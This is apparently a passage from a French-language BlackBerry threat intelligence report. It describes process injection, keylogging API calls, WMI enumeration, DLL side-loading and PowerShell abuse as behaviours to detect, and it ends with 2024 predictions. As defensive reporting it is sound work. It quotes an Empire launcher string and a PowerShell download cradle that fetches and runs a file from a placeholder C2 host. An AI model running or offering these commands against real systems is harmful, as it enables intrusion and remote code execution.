Vous trouverez ci-dessous une série de fonctions natives de Windows qui peuvent être utilisées de manière abusive en les injectant dans un processus.
Les fonctions sont appelées dans l'ordre (variable selon l'attaque) :
- VirtualAlloc(Ex) - Allocation de mémoire dans le processus
- WriteProcessMemory() - Écriture d'un code malveillant dans la mémoire allouée
- VirtualProtect - Reprotection de la mémoire avec des autorisations d'exécution
- CreateRemoteThread() - Exécuter un code malveillant dans le contexte d'un autre processus
Les attaquants utilisent des logiciels de vol d'informations personnalisés pour enregistrer les entrées des utilisateurs dans un système compromis en surveillant l'interface utilisateur graphique (GUI) ou, alternativement, en enregistrant les frappes au clavier.
BlackBerry a constaté qu'il était possible d'identifier les menaces et d'y remédier en surveillant les processus inhabituels qui effectuaient des captures d'entrée sous quelque forme que ce soit.
Les comportements courants que BlackBerry qualifierait d'"inhabituels" comprennent les signatures non valides, les processus enfants issus d'un processus parent atypique et les appels de fonctions spécifiques de l'API Windows.
Appels de fonctions à surveiller :
- SetWindowsHook(Ex) - Surveiller les événements tels que les entrées sur le bureau
- GetKeyboardState() - Récupère le statut de l'état actuel de la touche virtuelle
- GetKeyState() - Récupère l'état actuel de la clé virtuelle
- GetAsyncKeyState() - Récupère l'état actuel de la clé virtuelle
L'énumération des informations d'un système compromis peut fournir à un acteur de la menace le contexte nécessaire pour identifier les faiblesses et les vecteurs d'exploitation potentiels, afin d'escalader les privilèges et d'obtenir un accès illimité au système.
En créant une base de référence des comportements communs à l'ensemble du réseau et en surveillant les valeurs aberrantes, les professionnels de la cybersécurité peuvent observer toutes les anomalies.
En abusant de Windows Management Instrumentation (WMI), un acteur de la menace peut localiser des informations sur les logiciels antivirus, les disques logiques et les utilisateurs, afin d'identifier les points pivots ou les zones d'intérêt/faiblesses à exploiter par un attaquant. Cependant, ces appels sont relativement peu conventionnels pour la majorité des utilisateurs. La surveillance de leur occurrence pourrait permettre d'identifier un acteur malveillant ou un logiciel malveillant sur le système victime.
Vous trouverez ci-dessous des lignes de commande qu'il peut être utile de surveiller :
- SELECT * FROM AntiVirusProduct - Ligne de commande WMI permettant d'énumérer les produits antivirus présents sur le système.
- wmic OS get OSArchitecture, Version - Utilise WMI pour énumérer les informations relatives à la version du système.
- systeminfo - Fournit des informations sur le système à l'utilisateur
- driverquery /v - Liste les lecteurs installés sur le système
Les attaquants peuvent exécuter leur propre code malveillant en tirant parti de l'ordre de recherche des bibliothèques de liens dynamiques (DLL). Pour ce faire, ils placent la charge utile malveillante et l'application légitime de la victime l'une à côté de l'autre. Ensuite, chaque fois qu'un exécutable légitime est lancé, il charge le binaire malveillant tandis que l'ordre de recherche normal du système est exploité par l'attaquant.
En outre, les emplacements du système tels que les dossiers Windows Side-by-Side (SxS) et les dossiers système doivent être surveillés de près pour la suppression et le remplacement des DLL, une mesure que les adversaires les plus avancés tenteront de prendre pour échapper aux solutions modernes de détection et de réponse (EDR) des antivirus et des points de terminaison.
Un moyen courant d'identifier le chargement latéral de DLL consiste à surveiller les modules chargés à partir d'emplacements anormaux tels que la corbeille, les dossiers temporaires et les chemins d'accès ordinaires du système.
En utilisant des protocoles de la couche non applicative, les adversaires tentent d'échapper aux défenses qui sont mûres et bien réglées pour détecter les comportements malveillants. Du point de vue de l'atténuation et de la prévention, les protocoles moins courants, tels que ICMP, devraient être surveillés pour les communications C2.
Les clients de BlackBerry peuvent adopter une approche sûre et limitant les risques en créant des règles personnalisées pour surveiller des chaînes de caractères spécifiques sur la couche réseau et en utilisant ces règles en combinaison avec des règles de détection comportementale plus avancées. En associant des mesures préventives à une présence adéquate en matière de sécurité, les clients et les défenseurs de BlackBerry peuvent réduire leur vulnérabilité aux attaques et renforcer leur sensibilisation à la sécurité.
CylanceGUARD Données
Cette section du rapport met en évidence les détections de menaces les plus intéressantes observées dans les pays suivants CylanceGUARD® qui ont été ciblés par une menace au cours de la période couverte par le rapport.
CylanceGUARD est un service géré de détection et de réponse (MDR) sur abonnement qui assure une surveillance 24 heures sur 24, 7 jours sur 7 et 365 jours par an et aide les organisations à stopper les cybermenaces sophistiquées qui cherchent à combler les lacunes dans les programmes de sécurité des clients. L'équipe MDR de BlackBerry a suivi des milliers d'alertes au cours de cette période. Ci-dessous, nous décomposons la télémétrie région par région afin de fournir un aperçu supplémentaire du paysage actuel des menaces.
CylanceGUARD Observations
Dans le dernier rapport, l'équipe de CylanceGUARD a constaté que la technique "Common File Archive Exfiltration Staging" était utilisée de manière abusive dans toutes les régions géographiques où BlackBerry a des clients. Cependant, au cours de la période couverte par le présent rapport, nous avons enregistré des détections de PowerShell dans toutes les régions.
Dans les régions EMEA et NALA, l'équipe CylanceGUARD a constaté une augmentation des détections liées à PowerShell Empire - "Possible Empire Encoded Payload". PowerShell Empire est un framework post-exploit open-source couramment utilisé par les attaquants et les testeurs de pénétration/équipes rouges légitimes.
Le cadre Empire se concentre essentiellement sur le ciblage des environnements Windows à l'aide du langage de script PowerShell. Cela permet à un attaquant de communiquer avec l'ordinateur de la victime afin de transmettre et de recevoir des commandes et des informations provenant de serveurs C2.
Un indicateur précoce de l'Empire est la détection d'une commande telle que.. :
"POWERSHELL -NOP -STA -W 1 -ENC." Il s'agit de la chaîne de lancement par défaut dans les écouteurs HTTP d'Empire.
Il est à noter qu'il est facile pour un attaquant de modifier ou d'obscurcir cette valeur. Cependant, dans de nombreux cas, cette valeur n'est pas modifiée et constitue donc une signature efficace pour les équipes de détection et les analystes des centres d'opérations de sécurité (SOC).
Dans la région APAC, nous avons observé une évolution de la tactique d'accès aux informations d'identification(TA0006) vers l'exécution(TA0002) en tant que menace la plus couramment observée. PowerShell a de nouveau été très présent dans nos détections. La technique connexe de MITRE observée était Command and Scripting Interpreter : PowerShell(T1059.001). Au cours de nos enquêtes, le schéma le plus fréquemment observé par les acteurs de la menace était un berceau de téléchargement - il s'agit d'une commande unique utilisée à la fois pour le téléchargement et l'exécution de code.
Par exemple :
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('hxxp://x.x.x.x/test[.]exe')
- Cela permettrait de télécharger et d'exécuter le fichier test.exe à partir d'un éventuel serveur C2.
Le fait que PowerShell soit fortement détecté dans les environnements de nos clients souligne l'importance de s'assurer que les organisations disposent de la visibilité et des contrôles adéquats pour limiter les abus liés à PowerShell.
Dans le cadre de l'offre CylanceGUARD , notre équipe d'intégration (connue sous le nom de consultants ThreatZERO® ) travaille en étroite collaboration avec nos clients pour s'assurer que leurs appareils sont placés dans les politiques recommandées telles que Script Control Block (SCB - PS) pour limiter la capacité d'un attaquant à abuser d'utilitaires tels que PowerShell.
Activité observée
Ce tableau met en évidence les tendances communes (aseptisées) des commandes malveillantes ou suspectes enregistrées au cours de la période de référence.
Dans notre dernier rapport, nous avons expliqué comment la surveillance de l'utilisation de PowerShell offre une excellente occasion de détecter les activités malveillantes dans les environnements des clients. Cependant, il existe également d'autres outils LOLBAS qui sont couramment utilisés de manière abusive par les acteurs de la menace.
En termes simples, LOLBAS fait référence à un outil qui fait déjà partie du système et qui peut être utilisé à des fins malveillantes.
Le graphique ci-dessous illustre les cinq principales détections donnant lieu à une action que nous avons observées au cours de la période couverte par le présent rapport.
Le tableau ci-dessous illustre un exemple d'utilisation malveillante de LOLBAS.
Voir le tableau complet au format PDF.
Conclusions
Avec ce rapport sur les 120 jours, BlackBerry clôture une nouvelle année difficile pour le secteur de la cybersécurité. En divisant notre rapport annuel monolithique Global Threat Intelligence Report en une publication trimestrielle, notre nouveau format fournit désormais des recherches plus approfondies et actualisées ainsi que des informations exploitables sur le paysage numérique en constante évolution.
Vous trouverez ci-dessous un récapitulatif de nos quatre principales conclusions :
Au cours de cette période, BlackBerry a constaté une augmentation des attaques stoppées et des hachages uniques ciblant nos clients, pour la deuxième période consécutive. Cela démontre les efforts considérables déployés par les acteurs de la menace lorsqu'ils s'attaquent à des cibles très spécifiques et de grande valeur. Ces derniers mois de 2023 ont enregistré une augmentation de 19 % (31 attaques par minute) des attaques stoppées par minute, et une augmentation de 27 % (3,7 hachages par minute) des hachages uniques par minute.
BlackBerry Les solutions de cybersécurité de la Commission européenne ont permis d'arrêter plus de deux millions de cyberattaques contre ses clients du secteur des infrastructures critiques. En outre, nous avons bloqué plus d'un million d'attaques contre des entreprises commerciales clientes. Nous avons également constaté la prolifération continue des menaces MaaS à grande échelle, telles que RedLine, RisePro et LummaStealer, qui sont souvent vendues via des forums clandestins et des places de marché illicites sur le dark web. Un pourcentage élevé de téléchargeurs de marchandises et de logiciels malveillants voleurs d'informations a été observé dans les deux secteurs au cours de la période couverte par le présent rapport.
La militarisation et l'exploitation rapides des CVE par les acteurs de la menace, à savoir les groupes de ransomwares, est un phénomène que nous avions prévu dans notre précédent rapport. Parmi les exemples, on peut citer le groupe de ransomwares LockBit qui exploite l'exploit critique "Citrix Bleed" et le groupe de ransomwares Clop qui exploite l'exploit zero-day SysAid. Les groupes de ransomwares ont causé des dizaines de millions de dollars de dégâts dans le monde en 2023. En fin de compte, 2024 apportera probablement des changements similaires, car ces groupes modifient rapidement leurs attaques et développent leurs TTP pour maximiser leur impact potentiel.
L'escalade des privilèges, la collecte et la découverte sont les tactiques MITRE ATT&CK les plus fréquemment utilisées dans les échantillons malveillants observés au cours de la période couverte par le rapport. Il est essentiel de donner la priorité à la détection de ces tactiques dans un réseau. En apprenant ces TTP et les profils des acteurs de la menace, les défenseurs peuvent réduire de manière significative l'impact des attaques, ainsi que faciliter la chasse aux menaces, la réponse aux incidents et les efforts de récupération.
Prévisions
Utilisation accrue de la technologie Deepfake lors des prochaines élections dans le monde entier
2024 est une année importante dans le paysage politique, avec plus de 50 élections nationales prévues dans différents pays à travers le monde. Les périodes électorales sont souvent le théâtre de campagnes de désinformation et de mésinformation, et il est presque certain que cette année apportera une avalanche de ces deux types de campagnes.
Nous prévoyons que l'abus de la technologie "deepfake" par des acteurs malveillants sera au premier plan. La technologie Deepfake alimentée par les LLM permet aux acteurs malveillants de créer des médias très réalistes, mais faux et intentionnellement trompeurs sous la forme de photographies, d'enregistrements audio ou de supports multimédias. Il peut s'agir de discours falsifiés ou trafiqués, de vidéos manipulées ou d'extraits audio de personnalités politiques connues. Ce faux contenu sera propagé de manière stratégique par le biais de divers canaux de médias sociaux et d'applications de messagerie.
Les groupes criminels brésiliens s'intéressent désormais à l'hameçonnage et à la fraude liée aux pixels
Comme c'est parfois le cas avec les groupes cybercriminels mondiaux les plus prolifiques, nous pensons que les groupes cybercriminels brésiliens changeront de tactique pour se concentrer davantage sur la création de sites web de phishing afin d'inciter les victimes à effectuer des transferts de paiement via PIX, une méthode de paiement instantanée et gratuite. Cela a déjà commencé pendant la saison des taxes automobiles, lorsque les criminels ont abusé des moteurs de référencement pour afficher des pages de phishing frauduleuses contenant des données valides sur les véhicules et les propriétaires auxquelles (théoriquement) seul le gouvernement devrait avoir accès. Les fuites de données étant de plus en plus fréquentes, ce type d'activité est susceptible de se poursuivre.
Les appareils VPN resteront des cibles très attrayantes pour les acteurs de la menace des États-nations.
Les systèmes orientés vers l'internet, y compris les appareils VPN, continueront d'être la cible idéale des acteurs de la menace provenant d'États-nations malveillants, et ce pour plusieurs raisons. Les appareils placés sur des sections critiques d'un réseau peuvent ne pas disposer de logiciels de sécurité traditionnels tels que des antivirus ou des agents EDR, ce qui rend la détection d'une violation très difficile, en particulier lorsque des attaques de type "zero-day" sont utilisées. En outre, les compromissions des appareils VPN ne sont généralement pas détectées tant qu'un acteur de la menace n'est pas à l 'intérieur d'un réseau, ce qui complique l'éradication de la menace. Le ciblage des appareils VPN restera un choix très efficace pour les acteurs de la menace des États-nations afin d'accéder aux réseaux cibles jusqu'à ce qu'il existe une option plus efficace avec de bien meilleurs rendements.
S'attendre à une augmentation des attaques contre la chaîne d'approvisionnement
Nous prévoyons une augmentation des attaques contre la chaîne d'approvisionnement au fur et à mesure que 2024 avance. En effet, les réseaux de la chaîne d'approvisionnement sont incroyablement complexes et l'impact plus large de ces violations en ferait un vecteur d'attaque recherché par les acteurs de la menace. Les attaques peuvent viser les logiciels ou le matériel de la chaîne d'approvisionnement, tels que les appareils et les routeurs. Les entreprises doivent connaître le niveau de sécurité de leurs partenaires de la chaîne d'approvisionnement et mettre en place des plans de détection et d'atténuation pour faire face à de telles attaques.
Nous allons continuer à assister à une augmentation des attaques dans la région APAC
Nous prévoyons une augmentation des attaques de groupes parrainés par la Corée du Nord aux États-Unis, en Corée du Sud et au Japon. Alors que les pays alignés sur l'Occident continuent de s'associer pour lutter contre les cybermenaces soutenues par les deux acteurs les plus actifs de la région - la Chine et la Corée du Nord -, il est probable que nous verrons davantage d'attaques à motivation financière, que la Corée du Nord utilise pour échapper aux sanctions, et une augmentation des activités traditionnelles de cyberespionnage. Le conseiller japonais à la sécurité nationale, Takeo Akiba , a déclaré que les "activités cybernétiques illicites" de la Corée du Nord continuaient d'être "une source de financement" pour le développement des missiles nucléaires de l'État. La Corée du Nord a précédemment nié les allégations de piratage informatique ou d'autres cyberattaques.
Remerciements
Ce rapport est le fruit de la collaboration de nos équipes et de nos collaborateurs talentueux. Nous tenons à remercier tout particulièrement
Adrian Chambers
Amalkanth Raveendran
David Hegarty
Dean Given
Geoff O'Rourke
Ismael Valenzuela Espejo
Jacob Faires
John de Boer
Kristofer Vandercook
Natalia Capponi
Natasha Rohner
Patryk Matysik
Pedro Drimel
Ronald Welch
Travis Hoxmeier
William Johnson